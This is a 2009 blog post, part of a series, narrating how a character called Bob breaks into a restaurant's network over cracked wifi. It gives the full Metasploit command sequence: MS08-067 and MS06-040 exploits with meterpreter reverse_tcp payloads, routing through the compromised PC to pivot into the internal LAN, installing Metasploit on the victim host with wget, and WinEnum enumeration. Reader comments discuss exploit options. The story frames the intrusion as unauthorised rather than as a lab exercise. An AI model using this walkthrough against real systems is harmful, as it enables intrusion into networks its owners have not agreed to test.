Saturday, October 31, 2009

Bobs Double Penetration Adventure - Part 2

So Bob decides to revisit his new found playground at Walliford Fries and get to grips with his new tools. He connects up to the wifi with the password he's already cracked and this time rather than using the Autopwn feature he decides to try something else. Bob's idea is to use the PC he exploited previously as a point to launch other attacks deeper into the network.

Bob launches his trusty MS08-067 exploit this time with a meterpreter/reverse_tcp payload

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set RHOST 192.168.1.102

set ExitOnSession False

exploit -j -z




Excellent, Bob gets his session. He connects to the session and checks the network settings on his compromised host.

sessions -i 1
execute -H -f cmd.exe -i

ipconfig




While he is on the remote host Bob checks a few things, ideally he could do with knowing about the network servers. At this point he just wants the basics, name & IP.

Net view



And he could do with the IP addresses too. He'll want these for his scans.

ping -n 1 server01
ping -n 1 server02






That'll do for now. Bob comes out of the shell, backgrounds his meterpreter session and creates a route pointing to the internal LAN through his session.

exit
background

route add 10.0.1.0 255.255.255.0 1
route print



Now time to see if the magic works. Bob selects the auxiliary scanner and checks the OS versions of the two servers on the internal LAN by pivoting through his compromised host.

use auxiliary/scanner/smb/version
set RHOSTS 10.0.1.230

run
set RHOSTS 10.0.1.231
run



Hmmm, interesting. Windows 2003 with no service pack. Bob wonders if he can exploit that through the pivot?

use windows/smb/ms08_067_netapi
set RHOST 10.0.1.231

set PAYLOAD windows/meterpreter/reverse_tcp
exploit





Bugger! No such luck. Hang on though, Bob remembers something he read once. He can use Mubix's handy dandy deploymsf script to install Metasploit on his compromised host. Perfect!

He grabs files he needs from the web, putting them into his plugin directory.

cd /pentest/exploits/framework3/plugins/
wget http://metasploit.com/releases/framework-3.3-dev.exe
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

And then it's just a case of connecting back to his session on the pwned box, running the script and pointing it to the metasploit executable.

sessions -i 1
run deploymsf.rb -f ../../../pentest/exploits/framework3/plugins/framework-3.3-dev.exe




Holly crap Batman! look at that. Bob has installed Metasploit on the host he compromised, thanks to a weak password on the wireless LAN and a missing patch or two.



Now the output isnt always pretty but it gets the job done.



So whats next? Well there is that server with no service pack to take care of. For that Bob will try his old faithful ms06_040 exploit.

use windows/smb/ms06_040_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp

exploit



Perfect, another box to play with. Now Bob wants to dig in deep so he can play on this network for as long as possible so he's going to need to start pulling together some serious information. He could get this all manually but of course that's pretty dumb, especially when he can use Dark Operators excellent WinEnum script. This will go out and grab nearly everything he wants so he acn understand the network better and stick it all in one big text file so Bob has some bedtime reading. As Bobs already sitting in a meterpreter session he simply runs the WinEnum script.

run winenum




Sorted. Again it's getting late so Bob decides to call it a day. Before he does though he needs to leave himself a few backdoors.......which will of course be in the next post.

7 comments:

CG said...

if Bob had RTFM and set the appropriate target and changed the LPRORT that 08-067 exploit probably would have worked :-)

SynJunkie said...

Your right Chris, Bob is such a noob. I bet his excuse would be pretty lame like he was looking for a way to get the deploymsf.rb script in the blog post. We know the truth though, he clearly doesn't know what he's doing.

CG said...

as long as Bob gets his shell i guess that's all that matters :-)

SynJunkie said...

Nah, in the words of Carlos "Shell is just the beginning!". Bob wants the good stuff.

crazytrain1978 said...

Great Post, I always learn such a lot from these :) As a noob myself, could you or CG explain more clearly what the issue was with the ms08_067 example and what the appropriate host and lport should have been? Sorry if this is obvious to everyone else reading :)

Cheers,
crazytrain1978

SynJunkie said...

Sure. There are a number of additional options that could have been set, such as Target, LHOST, RHOST, LPORT, RPORT, SMBIPE and plenty more (show options and show advanced). In some circumstances these are required and in some they are not. For example, I just successfully popped a box specifying only the exploit (MS08-067), the payload (meterpreter/bind_tcp) and the RHOST (the remote target). I think that CG was letting me know that in some circumstances i may need to specify additional options.

One point though. Those options I just specified worked from a physical host to a virtual target. The same options would not work from virtual host to a virtual target. In fact the only way I could pop the virtual target from a virtual host was to use the db_autopwn feature.

Does that help?

crazytrain1978 said...

Yip sure does, thanks for taking the time to explain :) much appreciated and keep 'em coming :)

Cheers,
crazytrain1978